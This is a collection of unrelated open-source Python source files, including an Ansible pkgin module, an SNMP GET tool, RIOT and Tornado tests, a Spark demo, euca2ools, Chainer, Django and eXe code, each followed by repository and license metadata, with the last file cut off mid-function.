def remove_packages(module, packages):
remove_c = 0
# Using a for loop in case of error, we can report the package that failed
for package in packages:
# Query the package first, to see if we even need to remove
if not query_package(module, package):
continue
rc, out, err = module.run_command(
format_pkgin_command(module, "remove", package))
if not module.check_mode and query_package(module, package):
module.fail_json(msg="failed to remove %s: %s" % (package, out))
remove_c += 1
if remove_c > 0:
module.exit_json(changed=True, msg=format_action_message(module, "removed", remove_c))
module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, packages):
install_c = 0
for package in packages:
if query_package(module, package):
continue
rc, out, err = module.run_command(
format_pkgin_command(module, "install", package))
if not module.check_mode and not query_package(module, package):
module.fail_json(msg="failed to install %s: %s" % (package, out))
install_c += 1
if install_c > 0:
module.exit_json(changed=True, msg=format_action_message(module, "installed", install_c))
module.exit_json(changed=False, msg="package(s) already present")
def update_package_db(module):
rc, out, err = module.run_command(
format_pkgin_command(module, "update"))
if rc == 0:
if re.search('database for.*is up-to-date\n$', out):
return False, "datebase is up-to-date"
else:
return True, "updated repository database"
else:
module.fail_json(msg="could not update package db")
def do_upgrade_packages(module, full=False):
if full:
cmd = "full-upgrade"
else:
cmd = "upgrade"
rc, out, err = module.run_command(
format_pkgin_command(module, cmd))
if rc == 0:
if re.search('^nothing to do.\n$', out):
module.exit_json(changed=False, msg="nothing left to upgrade")
else:
module.fail_json(msg="could not %s packages" % cmd)
def upgrade_packages(module):
do_upgrade_packages(module)
def full_upgrade_packages(module):
do_upgrade_packages(module, True)
def clean_cache(module):
rc, out, err = module.run_command(
format_pkgin_command(module, "clean"))
if rc == 0:
# There's no indication if 'clean' actually removed anything,
# so assume it did.
module.exit_json(changed=True, msg="cleaned caches")
else:
module.fail_json(msg="could not clean package cache")
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(default="present", choices=["present", "absent"]),
name=dict(aliases=["pkg"], type='list'),
update_cache=dict(default='no', type='bool'),
upgrade=dict(default='no', type='bool'),
full_upgrade=dict(default='no', type='bool'),
clean=dict(default='no', type='bool'),
force=dict(default='no', type='bool')),
required_one_of=[['name', 'update_cache', 'upgrade', 'full_upgrade', 'clean']],
supports_check_mode=True)
global PKGIN_PATH
PKGIN_PATH = module.get_bin_path('pkgin', True, ['/opt/local/bin'])
module.run_command_environ_update = dict(LANG='C', LC_ALL='C', LC_MESSAGES='C', LC_CTYPE='C')
p = module.params
if p["update_cache"]:
c, msg = update_package_db(module)
if not (p['name'] or p["upgrade"] or p["full_upgrade"]):
module.exit_json(changed=c, msg=msg)
if p["upgrade"]:
upgrade_packages(module)
if not p['name']:
module.exit_json(changed=True, msg='upgraded packages')
if p["full_upgrade"]:
full_upgrade_packages(module)
if not p['name']:
module.exit_json(changed=True, msg='upgraded all packages')
if p["clean"]:
clean_cache(module)
if not p['name']:
module.exit_json(changed=True, msg='cleaned caches')
pkgs = p["name"]
if p["state"] == "present":
install_packages(module, pkgs)
elif p["state"] == "absent":
remove_packages(module, pkgs)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
gsutil-mirrors/pyasn1-modules | tools/snmpget.py | 6 | 1444 | #!/usr/bin/env python
#
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
# Generate SNMPGET request, parse response
#
import socket
import sys
from pyasn1.codec.ber import decoder
from pyasn1.codec.ber import encoder
from pyasn1_modules import rfc1157
if len(sys.argv) != 4:
print("""Usage:
$ %s <community> <host> <OID>""" % sys.argv[0])
sys.exit(-1)
msg = rfc1157.Message()
msg.setComponentByPosition(0)
msg.setComponentByPosition(1, sys.argv[1])
# pdu
pdus = msg.setComponentByPosition(2).getComponentByPosition(2)
pdu = pdus.setComponentByPosition(0).getComponentByPosition(0)
pdu.setComponentByPosition(0, 123)
pdu.setComponentByPosition(1, 0)
pdu.setComponentByPosition(2, 0)
vbl = pdu.setComponentByPosition(3).getComponentByPosition(3)
vb = vbl.setComponentByPosition(0).getComponentByPosition(0)
vb.setComponentByPosition(0, sys.argv[3])
v = vb.setComponentByPosition(1).getComponentByPosition(1).setComponentByPosition(0).getComponentByPosition(0).setComponentByPosition(3).getComponentByPosition(3)
print('sending: %s' % msg.prettyPrint())
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(encoder.encode(msg), (sys.argv[2], 161))
substrate, _ = sock.recvfrom(2048)
# noinspection PyRedeclaration
rMsg, _ = decoder.decode(substrate, asn1Spec=msg)
print('received: %s' % rMsg.prettyPrint())
| bsd-2-clause |
neiljay/RIOT | tests/gnrc_sock_udp/tests/01-run.py | 2 | 3192 | #!/usr/bin/env python3
# Copyright (C) 2016 Kaspar Schleiser <kaspar@schleiser.de>
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import os
import sys
def testfunc(child):
child.expect_exact(u"Calling test_sock_udp_create__EADDRINUSE()")
child.expect_exact(u"Calling test_sock_udp_create__EAFNOSUPPORT()")
child.expect_exact(u"Calling test_sock_udp_create__EINVAL_addr()")
child.expect_exact(u"Calling test_sock_udp_create__EINVAL_netif()")
child.expect_exact(u"Calling test_sock_udp_create__no_endpoints()")
child.expect_exact(u"Calling test_sock_udp_create__only_local()")
child.expect_exact(u"Calling test_sock_udp_create__only_local_reuse_ep()")
child.expect_exact(u"Calling test_sock_udp_create__only_remote()")
child.expect_exact(u"Calling test_sock_udp_create__full()")
child.expect_exact(u"Calling test_sock_udp_recv__EADDRNOTAVAIL()")
child.expect_exact(u"Calling test_sock_udp_recv__EAGAIN()")
child.expect_exact(u"Calling test_sock_udp_recv__ENOBUFS()")
child.expect_exact(u"Calling test_sock_udp_recv__EPROTO()")
child.expect_exact(u"Calling test_sock_udp_recv__ETIMEDOUT()")
child.expect_exact(u" * Calling sock_udp_recv()")
child.expect(r" \* \(timed out with timeout \d+\)")
child.expect_exact(u"Calling test_sock_udp_recv__socketed()")
child.expect_exact(u"Calling test_sock_udp_recv__socketed_with_remote()")
child.expect_exact(u"Calling test_sock_udp_recv__unsocketed()")
child.expect_exact(u"Calling test_sock_udp_recv__unsocketed_with_remote()")
child.expect_exact(u"Calling test_sock_udp_recv__with_timeout()")
child.expect_exact(u"Calling test_sock_udp_recv__non_blocking()")
child.expect_exact(u"Calling test_sock_udp_send__EAFNOSUPPORT()")
child.expect_exact(u"Calling test_sock_udp_send__EINVAL_addr()")
child.expect_exact(u"Calling test_sock_udp_send__EINVAL_netif()")
child.expect_exact(u"Calling test_sock_udp_send__EINVAL_port()")
child.expect_exact(u"Calling test_sock_udp_send__ENOTCONN()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_no_local_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_no_local()")
child.expect_exact(u"Calling test_sock_udp_send__socketed()")
child.expect_exact(u"Calling test_sock_udp_send__socketed_other_remote()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed_no_local_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed_no_local()")
child.expect_exact(u"Calling test_sock_udp_send__unsocketed()")
child.expect_exact(u"Calling test_sock_udp_send__no_sock_no_netif()")
child.expect_exact(u"Calling test_sock_udp_send__no_sock()")
child.expect_exact(u"ALL TESTS SUCCESSFUL")
if __name__ == "__main__":
sys.path.append(os.path.join(os.environ['RIOTTOOLS'], 'testrunner'))
from testrunner import run
sys.exit(run(testfunc))
| lgpl-2.1 |
mahak/spark | examples/src/main/python/status_api_demo.py | 26 | 2158 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import threading
import queue as Queue
from pyspark import SparkConf, SparkContext
def delayed(seconds):
def f(x):
time.sleep(seconds)
return x
return f
def call_in_background(f, *args):
result = Queue.Queue(1)
t = threading.Thread(target=lambda: result.put(f(*args)))
t.daemon = True
t.start()
return result
def main():
conf = SparkConf().set("spark.ui.showConsoleProgress", "false")
sc = SparkContext(appName="PythonStatusAPIDemo", conf=conf)
def run():
rdd = sc.parallelize(range(10), 10).map(delayed(2))
reduced = rdd.map(lambda x: (x, 1)).reduceByKey(lambda x, y: x + y)
return reduced.map(delayed(2)).collect()
result = call_in_background(run)
status = sc.statusTracker()
while result.empty():
ids = status.getJobIdsForGroup()
for id in ids:
job = status.getJobInfo(id)
print("Job", id, "status: ", job.status)
for sid in job.stageIds:
info = status.getStageInfo(sid)
if info:
print("Stage %d: %d tasks total (%d active, %d complete)" %
(sid, info.numTasks, info.numActiveTasks, info.numCompletedTasks))
time.sleep(1)
print("Job results are:", result.get())
sc.stop()
if __name__ == "__main__":
main()
| apache-2.0 |
nagyistoce/euca2ools | euca2ools/commands/autoscaling/updateautoscalinggroup.py | 6 | 4140 | # Copyright 2013 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from euca2ools.commands.argtypes import delimited_list
from euca2ools.commands.autoscaling import AutoScalingRequest
from requestbuilder import Arg
class UpdateAutoScalingGroup(AutoScalingRequest):
DESCRIPTION = "Update an auto-scaling group's parameters"
ARGS = [Arg('AutoScalingGroupName', metavar='ASGROUP',
help='name of the auto-scaling group to update (required)'),
Arg('--default-cooldown', dest='DefaultCooldown',
metavar='SECONDS', type=int,
help='''amount of time, in seconds, after a scaling activity
completes before any further trigger-related scaling
activities may start'''),
Arg('--desired-capacity', dest='DesiredCapacity', metavar='COUNT',
type=int,
help='number of running instances the group should contain'),
Arg('--grace-period', dest='HealthCheckGracePeriod',
metavar='SECONDS', type=int, help='''number of seconds to wait
before starting health checks on newly-created instances'''),
Arg('--health-check-type', dest='HealthCheckType',
choices=('EC2', 'ELB'),
help='service to obtain health check status from'),
Arg('-l', '--launch-configuration', dest='LaunchConfigurationName',
metavar='LAUNCHCONFIG', help='''name of the launch
configuration to use with the new group (required)'''),
Arg('-M', '--max-size', dest='MaxSize', metavar='COUNT', type=int,
help='maximum group size (required)'),
Arg('-m', '--min-size', dest='MinSize', metavar='COUNT', type=int,
help='minimum group size (required)'),
Arg('--placement-group', dest='PlacementGroup',
help='placement group in which to launch new instances'),
Arg('--termination-policies', dest='TerminationPolicies.member',
metavar='POLICY1,POLICY2,...', type=delimited_list(','),
help='''ordered list of termination policies. The first has
the highest precedence.'''),
Arg('--vpc-zone-identifier', dest='VPCZoneIdentifier',
metavar='ZONE1,ZONE2,...',
help='''comma-separated list of subnet identifiers. If you
specify availability zones as well, ensure the subnets'
availability zones match the ones you specified'''),
Arg('-z', '--availability-zones', dest='AvailabilityZones.member',
metavar='ZONE1,ZONE2,...', type=delimited_list(','),
help='''comma-separated list of availability zones for the new
group (required unless subnets are supplied)''')]
| bsd-2-clause |
StealthMicro/OctoPi-Makerbot | env/Lib/site-packages/tornado/test/testing_test.py | 7 | 2208 | #!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
from tornado import gen
from tornado.testing import AsyncTestCase, gen_test
from tornado.test.util import unittest
class AsyncTestCaseTest(AsyncTestCase):
def test_exception_in_callback(self):
self.io_loop.add_callback(lambda: 1 / 0)
try:
self.wait()
self.fail("did not get expected exception")
except ZeroDivisionError:
pass
def test_subsequent_wait_calls(self):
"""
This test makes sure that a second call to wait()
clears the first timeout.
"""
self.io_loop.add_timeout(self.io_loop.time() + 0.01, self.stop)
self.wait(timeout=0.02)
self.io_loop.add_timeout(self.io_loop.time() + 0.03, self.stop)
self.wait(timeout=0.15)
class SetUpTearDownTest(unittest.TestCase):
def test_set_up_tear_down(self):
"""
This test makes sure that AsyncTestCase calls super methods for
setUp and tearDown.
InheritBoth is a subclass of both AsyncTestCase and
SetUpTearDown, with the ordering so that the super of
AsyncTestCase will be SetUpTearDown.
"""
events = []
result = unittest.TestResult()
class SetUpTearDown(unittest.TestCase):
def setUp(self):
events.append('setUp')
def tearDown(self):
events.append('tearDown')
class InheritBoth(AsyncTestCase, SetUpTearDown):
def test(self):
events.append('test')
InheritBoth('test').run(result)
expected = ['setUp', 'test', 'tearDown']
self.assertEqual(expected, events)
class GenTest(AsyncTestCase):
def setUp(self):
super(GenTest, self).setUp()
self.finished = False
def tearDown(self):
self.assertTrue(self.finished)
super(GenTest, self).tearDown()
@gen_test
def test_sync(self):
self.finished = True
@gen_test
def test_async(self):
yield gen.Task(self.io_loop.add_callback)
self.finished = True
if __name__ == '__main__':
unittest.main()
| agpl-3.0 |
AlpacaDB/chainer | chainer/functions/math/batch_l2_norm_squared.py | 4 | 1734 | import numpy
from chainer import cuda
from chainer import function
from chainer.utils import array
from chainer.utils import type_check
class BatchL2NormSquared(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x_type, = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim >= 2,
)
def forward_cpu(self, inputs):
x = array.as_mat(inputs[0])
return (x * x).sum(axis=1),
def forward_gpu(self, inputs):
x = array.as_mat(inputs[0])
l2normsquared_kernel = cuda.cupy.ReductionKernel(
'T x', 'T y', 'x * x', 'a + b', 'y = a', '0', 'l2normsquared'
)
return l2normsquared_kernel(x, axis=1),
def backward(self, inputs, gy):
x = inputs[0]
xp = cuda.get_array_module(x)
gy0 = gy[0].reshape(-1, *((1,) * (x.ndim - 1)))
if xp is numpy:
gx = 2 * x * gy0
else:
kernel = cuda.elementwise(
'T x, T gy', 'T gx', 'gx = 2 * x * gy',
'l2normsquared_bwd')
gx = kernel(x, gy0)
return gx,
def batch_l2_norm_squared(x):
"""L2 norm (a.k.a. Euclidean norm) squared.
This function implements the square of L2 norm on a vector. No reduction
along batch axis is done.
Args:
x (~chainer.Variable): Input variable. The first dimension is assumed
to be the *minibatch dimension*. If x has more than two dimensions
all but the first dimension are flattened to one dimension.
Returns:
~chainer.Variable: Two dimensional output variable.
"""
return BatchL2NormSquared()(x)
| mit |
andim27/magiccamp | build/lib/django/utils/tree.py | 310 | 5778 | """
A class for storing a tree graph. Primarily used for filter constructs in the
ORM.
"""
from django.utils.copycompat import deepcopy
class Node(object):
"""
A single internal node in the tree graph. A Node should be viewed as a
connection (the root) with the children being either leaf nodes or other
Node instances.
"""
# Standard connector type. Clients usually won't use this at all and
# subclasses will usually override the value.
default = 'DEFAULT'
def __init__(self, children=None, connector=None, negated=False):
"""
Constructs a new Node. If no connector is given, the default will be
used.
Warning: You probably don't want to pass in the 'negated' parameter. It
is NOT the same as constructing a node and calling negate() on the
result.
"""
self.children = children and children[:] or []
self.connector = connector or self.default
self.subtree_parents = []
self.negated = negated
# We need this because of django.db.models.query_utils.Q. Q. __init__() is
# problematic, but it is a natural Node subclass in all other respects.
def _new_instance(cls, children=None, connector=None, negated=False):
"""
This is called to create a new instance of this class when we need new
Nodes (or subclasses) in the internal code in this class. Normally, it
just shadows __init__(). However, subclasses with an __init__ signature
that is not an extension of Node.__init__ might need to implement this
method to allow a Node to create a new instance of them (if they have
any extra setting up to do).
"""
obj = Node(children, connector, negated)
obj.__class__ = cls
return obj
_new_instance = classmethod(_new_instance)
def __str__(self):
if self.negated:
return '(NOT (%s: %s))' % (self.connector, ', '.join([str(c) for c
in self.children]))
return '(%s: %s)' % (self.connector, ', '.join([str(c) for c in
self.children]))
def __deepcopy__(self, memodict):
"""
Utility method used by copy.deepcopy().
"""
obj = Node(connector=self.connector, negated=self.negated)
obj.__class__ = self.__class__
obj.children = deepcopy(self.children, memodict)
obj.subtree_parents = deepcopy(self.subtree_parents, memodict)
return obj
def __len__(self):
"""
The size of a node if the number of children it has.
"""
return len(self.children)
def __nonzero__(self):
"""
For truth value testing.
"""
return bool(self.children)
def __contains__(self, other):
"""
Returns True is 'other' is a direct child of this instance.
"""
return other in self.children
def add(self, node, conn_type):
"""
Adds a new node to the tree. If the conn_type is the same as the root's
current connector type, the node is added to the first level.
Otherwise, the whole tree is pushed down one level and a new root
connector is created, connecting the existing tree and the new node.
"""
if node in self.children and conn_type == self.connector:
return
if len(self.children) < 2:
self.connector = conn_type
if self.connector == conn_type:
if isinstance(node, Node) and (node.connector == conn_type or
len(node) == 1):
self.children.extend(node.children)
else:
self.children.append(node)
else:
obj = self._new_instance(self.children, self.connector,
self.negated)
self.connector = conn_type
self.children = [obj, node]
def negate(self):
"""
Negate the sense of the root connector. This reorganises the children
so that the current node has a single child: a negated node containing
all the previous children. This slightly odd construction makes adding
new children behave more intuitively.
Interpreting the meaning of this negate is up to client code. This
method is useful for implementing "not" arrangements.
"""
self.children = [self._new_instance(self.children, self.connector,
not self.negated)]
self.connector = self.default
def start_subtree(self, conn_type):
"""
Sets up internal state so that new nodes are added to a subtree of the
current node. The conn_type specifies how the sub-tree is joined to the
existing children.
"""
if len(self.children) == 1:
self.connector = conn_type
elif self.connector != conn_type:
self.children = [self._new_instance(self.children, self.connector,
self.negated)]
self.connector = conn_type
self.negated = False
self.subtree_parents.append(self.__class__(self.children,
self.connector, self.negated))
self.connector = self.default
self.negated = False
self.children = []
def end_subtree(self):
"""
Closes off the most recently unmatched start_subtree() call.
This puts the current state into a node of the parent tree and returns
the current instances state to be the parent.
"""
obj = self.subtree_parents.pop()
node = self.__class__(self.children, self.connector)
self.connector = obj.connector
self.negated = obj.negated
self.children = obj.children
self.children.append(node)
| bsd-3-clause |
RichDijk/eXe | exe/webui/editorpane.py | 1 | 19032 | # ===========================================================================
# eXe
# Copyright 2004-2006, University of Auckland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# ===========================================================================
"""
The EditorPane is responsible for creating new idevice
"""
import logging
from exe.webui import common
from exe.engine.field import TextField, TextAreaField, ImageField, FlashField
from exe.engine.field import FeedbackField, MultimediaField, AttachmentField
from exe.webui.editorelement import TextEditorElement
from exe.webui.editorelement import TextAreaEditorElement
from exe.webui.editorelement import ImageEditorElement
from exe.webui.editorelement import FeedbackEditorElement
from exe.webui.editorelement import FlashEditorElement
from exe.webui.editorelement import MultimediaEditorElement
from exe.webui.editorelement import AttachmentEditorElement
from exe.engine.idevice import Idevice
from exe.engine.genericidevice import GenericIdevice
from exe.engine.path import Path
from exe.engine.translate import lateTranslate
from exe import globals as G
log = logging.getLogger(__name__)
# ===========================================================================
class EditorPane(object):
"""
The EditorPane is responsible for creating new idevice
"""
def __init__(self, webServer, parent):
"""
Initialize
JR: anado parente para poder acceder a algunos atributos de editorpag, en concreto a showHide
"""
self.ideviceStore = webServer.application.ideviceStore
self.webDir = webServer.application.config.webDir
self.styles = webServer.application.config.styleStore.getStyles()
self.elements = []
self.idevice = GenericIdevice("", "", "", "", "")
self.idevice.id = self.ideviceStore.getNewIdeviceId()
self.originalIdevice = GenericIdevice("", "", "", "", "")
self.purpose = ""
self.tip = ""
self.message = ""
self.parent = parent
self._nameInstruc = \
x_(u"Your new iDevice will appear in the iDevice "
u"pane with this title. This is a compulsory field "
u"and you will be prompted to enter a label if you try "
u"to submit your iDevice without one.")
self._authorInstruc = x_(u"This is an optional field.")
self._purposeInstruc = x_(u"The purpose dialogue allows you to describe"
u" your intended purpose of the iDevice to other"
u" potential users.")
self._emphasisInstruc = x_(u"Use this pulldown to select whether or not "
u" the iDevice should have any formatting "
u" applied to it to distinguish "
u"it; ie. a border and an icon.")
self._tipInstruc = x_(u"Use this field to describe "
u"your intended use and the pedagogy behind "
u"the device's development. This can be useful "
u"if your iDevice is to be exported for others "
u"to use.")
self._lineInstruc = x_(u"Add a single text line to an iDevice. "
u"Useful if you want the ability to place a "
u"label within the iDevice.")
self._textBoxInstruc = x_(u"Add a text entry box to an iDevice. "
u"Used for entering larger amounts of textual "
u"content.")
self._feedbackInstruc = x_(u"Add an interactive feedback field to your iDevice.")
self._flashInstruc = x_(u"Add a flash video to your iDevice.")
self._mp3Instruc = x_(u"Add an mp3 file to your iDevice.")
self._attachInstruc = x_(u"Add an attachment file to your iDevice.")
self.style = self.styles[0]
# Properties
nameInstruc = lateTranslate('nameInstruc')
authorInstruc = lateTranslate('authorInstruc')
purposeInstruc = lateTranslate('purposeInstruc')
emphasisInstruc = lateTranslate('emphasisInstruc')
tipInstruc = lateTranslate('tipInstruc')
lineInstruc = lateTranslate('lineInstruc')
textBoxInstruc = lateTranslate('textBoxInstruc')
feedbackInstruc = lateTranslate('feedbackInstruc')
flashInstruc = lateTranslate('flashInstruc')
mp3Instruc = lateTranslate('mp3Instruc')
attachInstruc = lateTranslate('attachInstruc')
def setIdevice(self, idevice):
"""
Sets the iDevice to edit
"""
self.idevice = idevice.clone()
self.idevice.id = idevice.id
self.originalIdevice = idevice
def process(self, request, status):
"""
Process
"""
log.debug("process " + repr(request.args))
self.message = ""
if status == "old":
for element in self.elements:
element.process(request)
if "title" in request.args:
self.idevice.title = unicode(request.args["title"][0], 'utf8')
if "tip" in request.args:
self.idevice.tip = unicode(request.args["tip"][0], 'utf8')
if "emphasis" in request.args:
self.idevice.emphasis = int(request.args["emphasis"][0])
if self.idevice.emphasis == 0:
self.idevice.icon = ""
if "addText" in request.args:
field = TextField(_(u"Enter the label here"),
_(u"Enter instructions for completion here"))
field.setIDevice(self.idevice)
self.idevice.addField(field)
self.idevice.edit = True
if "addTextArea" in request.args:
field = TextAreaField(_(u"Enter the label here"),
_(u"Enter the instructions for completion here"))
field.setIDevice(self.idevice)
self.idevice.addField(field)
self.idevice.edit = True
if "addFeedback" in request.args:
field = FeedbackField(_(u"Enter the label here"),
_(u"""Feedback button will not appear if no
data is entered into this field."""))
field.setIDevice(self.idevice)
self.idevice.addField(field)
self.idevice.edit = True
#if "addFlash" in request.args:
#print "add a flash"
#field = FlashField(_(u"Enter the label here"),
#_(u"Enter the instructions for completion here"))
#field.setIDevice(self.idevice)
#self.idevice.addField(field)
if "addMP3" in request.args:
field = MultimediaField(_(u"Enter the label here"),
_(u"Enter the instructions for completion here"))
field.setIDevice(self.idevice)
self.idevice.addField(field)
if not 'xspf_player.swf' in self.idevice.systemResources:
self.idevice.systemResources += ['xspf_player.swf']
self.idevice.edit = True
if "addAttachment" in request.args:
field = AttachmentField(_(u"Enter the label here"),
_(u"Enter the instructions for completion here"))
field.setIDevice(self.idevice)
self.idevice.addField(field)
self.idevice.edit = True
if ("action" in request.args and
request.args["action"][0] == "selectIcon"):
self.idevice.icon = request.args["object"][0]
if "preview" in request.args:
if self.idevice.title == "":
self.message = _("Please enter<br />an idevice name.")
else:
self.idevice.edit = False
if "edit" in request.args:
self.idevice.edit = True
if "cancel" in request.args:
ideviceId = self.idevice.id
self.idevice = self.originalIdevice.clone()
self.idevice.id = ideviceId
self.parent.showHide = False
if ("action" in request.args and
request.args["action"][0] == "changeStyle"):
self.style = self.styles[int(request.args["object"][0])]
self.__buildElements()
def __buildElements(self):
"""
Building up element array
"""
self.elements = []
elementTypeMap = {TextField: TextEditorElement,
TextAreaField: TextAreaEditorElement,
ImageField: ImageEditorElement,
FeedbackField: FeedbackEditorElement,
MultimediaField: MultimediaEditorElement,
FlashField: FlashEditorElement,
AttachmentField: AttachmentEditorElement}
for field in self.idevice.fields:
elementType = elementTypeMap.get(field.__class__)
if elementType:
# Create an instance of the appropriate element class
log.debug(u"createElement "+elementType.__class__.__name__+
u" for "+field.__class__.__name__)
self.elements.append(elementType(field))
else:
log.error(u"No element type registered for " +
field.__class__.__name__)
def renderButtons(self, request):
"""
Render the idevice being edited
"""
html = "<font color=\"red\"><b>"+self.message+"</b></font>"
html += "<fieldset><legend><b>" + _("Add Field")+ "</b></legend>"
html += common.submitButton("addText", _("Text Line"))
html += common.elementInstruc(self.lineInstruc) + "<br/>"
html += common.submitButton("addTextArea", _("Text Box"))
html += common.elementInstruc(self.textBoxInstruc) + "<br/>"
html += common.submitButton("addFeedback", _("Feedback"))
html += common.elementInstruc(self.feedbackInstruc) + "<br/>"
# Attachments are now embeddable:
#html += common.submitButton("addAttachment", _("Attachment"))
#html += common.elementInstruc(self.attachInstruc) + "<br/>"
# MP3 fields are now embeddable:
#html += common.submitButton("addMP3", _("MP3"))
#html += common.elementInstruc(self.mp3Instruc) + "<br/>"
html += "</fieldset>\n"
html += "<fieldset><legend><b>" + _("Actions") + "</b></legend>"
if self.idevice.edit:
html += common.submitButton("preview", _("Preview"), not self.parent.isGeneric)
else:
html += common.submitButton("edit", _("Edit"))
html += "<br/>"
html += common.submitButton("cancel", _("Cancel"))
#html += "</fieldset>"
return html
def renderIdevice(self, request):
"""
Returns an XHTML string for rendering the new idevice
"""
html = "<div id=\"editorWorkspace\">\n"
html += "<script type=\"text/javascript\">\n"
html += "<!--\n"
html += """
function submitLink(action, object, changed)
{
var form = document.getElementById("contentForm")
form.action.value = action;
form.object.value = object;
form.isChanged.value = changed;
form.submit();
}\n"""
html += """
function submitIdevice()
{
var form = document.getElementById("contentForm")
if (form.ideviceSelect.value == "newIdevice")
form.action.value = "newIdevice"
else
form.action.value = "changeIdevice"
form.object.value = form.ideviceSelect.value;
form.isChanged.value = 1;
form.submit();
}\n"""
html += """
function submitStyle()
{
var form = document.getElementById("contentForm")
form.action.value = "changeStyle";
form.object.value = form.styleSelect.value;
form.isChanged.value = 0;
form.submit();
}\n"""
html += "//-->\n"
html += "</script>\n"
self.purpose = self.idevice.purpose.replace("\r", "")
self.purpose = self.purpose.replace("\n","\\n")
self.tip = self.idevice.tip.replace("\r", "")
self.tip = self.tip.replace("\n","\\n")
if self.idevice.edit:
html += "<b>" + _("Name") + ": </b>\n"
html += common.elementInstruc(self.nameInstruc) + "<br/>"
html += '<input type="text" name= "title" id="title" value="%s"/>' % self.idevice.title
this_package = None
html += common.formField('richTextArea', this_package,
_(u"Pedagogical Tip"),'tip',
'', self.tipInstruc, self.tip)
html += "<b>" + _("Emphasis") + ":</b> "
html += "<select onchange=\"submit();\" name=\"emphasis\">\n"
emphasisValues = {Idevice.NoEmphasis: _(u"No emphasis"),
Idevice.SomeEmphasis: _(u"Some emphasis")}
for value, description in emphasisValues.items():
html += "<option value=\""+unicode(value)+"\" "
if self.idevice.emphasis == value:
html += "selected "
html += ">" + description + "</option>\n"
html += "</select> \n"
html += common.elementInstruc(self.emphasisInstruc)
html += "<br/><br/>\n"
if self.idevice.emphasis > 0:
html += self.__renderStyles() + " "
html += u'<a href="#" '
html += u'onmousedown="Javascript:updateCoords(event);"\n'
html += u'onclick="Javascript:showMe(\'iconpanel\', 350, 100);">'
html += u'Select an icon:</a> \n'
icon = self.idevice.icon
if icon != "":
html += '<img align="middle" '
html += 'src="/style/%s/icon_%s' % (self.style.get_dirname(), icon)
html += '.gif"/><br/>'
html += u'<div id="iconpanel" style="display:none; z-index:99;">'
html += u'<div style="float:right;" >\n'
html += u'<img alt="%s" ' % _("Close")
html += u'src="/images/stock-stop.png" title="%s"\n' % _("Close")
html += u'onmousedown="Javascript:hideMe();"/></div><br/> \n'
html += u'<div align="center"><b>%s:</b></div><br/>' % _("Icons")
html += self.__renderIcons()
html += u'</div><br/>\n'
for element in self.elements:
html += element.renderEdit()
else:
html += "<b>" + self.idevice.title + "</b><br/><br/>"
for element in self.elements:
html += element.renderPreview()
if self.idevice.purpose != "" or self.idevice.tip != "":
html += "<a title=\""+_("Pedagogical Help")+"\" "
html += "onmousedown=\"Javascript:updateCoords(event);\" \n"
html += "onclick=\"Javascript:showMe('phelp', 380, 240);\" \n"
html += "href=\"Javascript:void(0)\" style=\"cursor:help;\">\n "
html += '<img alt="%s" src="/images/info.png" border="0" \n' % _('Info')
html += "align=\"middle\" /></a>\n"
html += "<div id=\"phelp\" style=\"display:none;\">\n"
